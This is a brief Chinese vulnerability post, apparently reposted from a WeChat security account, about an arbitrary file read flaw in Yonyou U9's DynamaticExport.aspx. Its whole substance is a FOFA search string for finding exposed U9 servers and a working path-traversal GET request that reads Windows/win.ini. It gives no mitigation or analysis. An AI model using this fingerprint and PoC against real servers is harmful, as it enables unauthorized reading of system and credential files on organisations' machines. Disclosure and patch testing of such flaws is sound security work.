用友U9 DynamaticExport任意文件读取漏洞

发布于 作者:

原文链接: https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247500953&idx=1&sn=616ebafdcd78c30f209b3f5ed9a2a080

用友U9 DynamaticExport任意文件读取漏洞

原创 安全透视镜 网络安全透视镜 2025-07-10 23:10

fofa语法 

body="logo-u9.png"

POC

GET 

/print/DynamaticExport.aspx?filePath=../../../../../../../../../../../../Windows/win.ini

用友U9 DynamaticExport任意文件读取漏洞